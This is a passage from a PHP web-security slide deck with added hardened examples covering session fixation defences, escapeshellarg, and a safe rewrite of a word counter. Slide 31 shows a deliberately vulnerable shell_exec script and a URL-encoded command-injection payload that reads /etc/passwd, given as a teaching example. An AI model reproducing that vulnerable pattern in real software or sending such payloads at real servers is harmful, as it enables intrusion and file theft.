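    ini_set('session.use_strict_mode', '1');    // reject IDs the server did not create (PHP >= 5.5.2),
                                                // which is what defeats the fixation on slide 28
    ini_set('session.cookie_httponly', '1');    // document.cookie (slide 19) can no longer read it
    ini_set('session.cookie_lifetime', (string) SESSION_IDLE_LIMIT);
    ini_set('session.gc_maxlifetime', (string) SESSION_IDLE_LIMIT);
    session_start();
}

// Server-side timeout: the browser may keep sending an old cookie, so the server
// records when the session was last used and refuses stale ones itself.
function enforceIdleTimeout(int $now): bool
{
    if (isset($_SESSION['last_seen']) && $now - $_SESSION['last_seen'] > SESSION_IDLE_LIMIT) {
        $_SESSION = [];
        session_destroy();
        return false;   // caller treats the user as logged out
    }
    $_SESSION['last_seen'] = $now;
    return true;
}

// Status change (login, role change): move to a fresh ID and delete the old one,
// so an ID sniffed or fixed before this point no longer maps to the privileged session.
function onLoginSuccess(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['user_id'] = $userId;
    $_SESSION['last_seen'] = time();
}

// Usage at the top of every authenticated page:
startHardenedSession();
if (!enforceIdleTimeout(time())) {
    header('Location: /login.php');
    exit;
}
```

session_regenerate_id(true) is the one call that matters for fixation even on servers where strict mode is unavailable: whatever ID the victim arrived with, the logged-in session gets a new one.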
  • 31. Remote Execution
    Injection of shell commands:

        <?php
        $filename = $_GET['filename'];
        $command = "/usr/bin/wc $filename";
        $words = shell_exec($command);
        print "$filename contains $words words.";
        ?>

    This is ok...
        wordcount.php?filename=textfile.txt
    But what if I give it like this?
        wordcount.php?filename=%2Fdev%2Fnull%20%7C%20cat%20%2Fetc%2Fpasswd
    (filename -> /dev/null | cat /etc/passwd), so the command run is
        /usr/bin/wc /dev/null | cat /etc/passwd
  • 32. Remote Execution Defense
    Allow only trusted, human users to import code
    Store uploads outside of the web document root
    Limit allowable filename extensions for upload
    Use the disable_functions directive, eg:
        disable_functions = "eval,phpinfo"
    Do not include PHP scripts from remote servers, eg:
        <?php include('http://example.net/code/common.php') ?>
    Properly escape all shell commands: escapeshellarg(), escapeshellcmd()
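The word counter from slide 31 rewritten with the slide-32 defences, as an added example that is not code from the original slides. The user-supplied name is reduced to a basename, checked against an extension allowlist, resolved with realpath() inside an upload directory outside the document root, and only then quoted with escapeshellarg(). UPLOAD_DIR, resolveUpload() and countWords() are our own names; PHP 7 or later is assumed.

```php
<?php
// Added example, not from the original slides. UPLOAD_DIR, resolveUpload() and
// countWords() are assumed names; the directory path is a placeholder.

const UPLOAD_DIR = '/var/app/uploads';   // outside the web document root (slide 32)

/**
 * Return the canonical path of $name inside UPLOAD_DIR, or null if it is not a
 * regular .txt file there. basename() drops any directory part the user supplied;
 * realpath() resolves symlinks and ".." so the prefix check below is meaningful.
 */
function resolveUpload(string $name): ?string
{
    $base = realpath(UPLOAD_DIR);
    if ($base === false) {
        return null;
    }
    $safeName = basename($name);
    if (!preg_match('/\A[A-Za-z0-9._-]+\.txt\z/', $safeName)) {
        return null;    // limit allowable filename extensions and characters
    }
    $real = realpath($base . DIRECTORY_SEPARATOR . $safeName);
    if ($real === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0 || !is_file($real)) {
        return null;
    }
    return $real;
}

/**
 * Count words with wc(1). The path has already been vetted, and escapeshellarg()
 * still wraps it in single quotes so the shell sees exactly one argument whatever
 * characters it contains; a value like "/dev/null | cat /etc/passwd" would have
 * failed resolveUpload() first and, if passed here anyway, is just a quoted string.
 */
function countWords(string $path): int
{
    $cmd = '/usr/bin/wc -w ' . escapeshellarg($path);
    $out = shell_exec($cmd);
    if ($out === null || $out === false) {
        throw new RuntimeException('wc failed');
    }
    return (int) trim($out);    // wc prints "<count> <path>"; the cast keeps the leading number
}

// Usage with the slide's request parameter:
$path = resolveUpload($_GET['filename'] ?? '');
if ($path === null) {
    http_response_code(400);
    exit('No such upload');
}
printf("%s contains %d words.\n",
    htmlentities(basename($path), ENT_QUOTES, 'UTF-8'), countWords($path));
```

Two layers are used on purpose: the allowlist and realpath() decide whether the file may be touched at all, and escapeshellarg() guarantees that whatever reaches the shell is data, not syntax. Either layer alone has failed often enough in practice to justify keeping both.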
  • 33. Future? PHP 6.0
    Deprecation:
        Register Globals - big security hole
        Safe Mode - false sense of security
        Magic Quotes - messed with the data
    Upcoming changes and features:
        http://www.php.net/~derick/meeting-notes.html
        http://www.phphacks.com/content/view/49/33/
    Rasmus Lerdorf - PHP 6.0 Wish List:
        http://news.php.net/php.internals/17883
  • 34. What to do?
    Proper input validation
    Don't do Programming + Security; do Secure Programming
    htmlentities, mysql_real_escape_string, parse_url, addslashes, escapeshellarg, escapeshellcmd... etc.
    SSL
    Use PEAR, PECL
  • 35. Images from Flickr.com
    reference - http://flickr.com/photos/opinicus/246099418/
    remote_boy - http://flickr.com/photo_zoom.gne?id=331355695&size=l
    level_cross - http://flickr.com/photo_zoom.gne?id=67342604&size=o
    injection3 - http://flickr.com/photos/fleurdelisa/249435636/
    building game1 - http://flickr.com/photo_zoom.gne?id=346575350&size=o
    computer_baby1 - http://flickr.com/photo_zoom.gne?id=102207751&size=o
    country_border1 - http://flickr.com/photo_zoom.gne?id=48740674&size=l
    computer_baby - http://flickr.com/photo_zoom.gne?id=436594815&size=m
    hijack - http://flickr.com/photo_zoom.gne?id=463129891&size=l
    dog_security - http://flickr.com/photo_zoom.gne?id=2205272682&size=l
    Id card - http://flickr.com/photo_zoom.gne?id=1269802640&size=o
  • 36. Reference
    Pro PHP Security, Chris Snyder and Michael Southwell
    http://wikipedia.org/
    http://www.sitepoint.com/article/php-security-blunders
    http://phpsec.org/
    www.google.com
  • 39. Copyright (c) 2008
    Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation.
    http://www.gnu.org/copyleft/fdl.html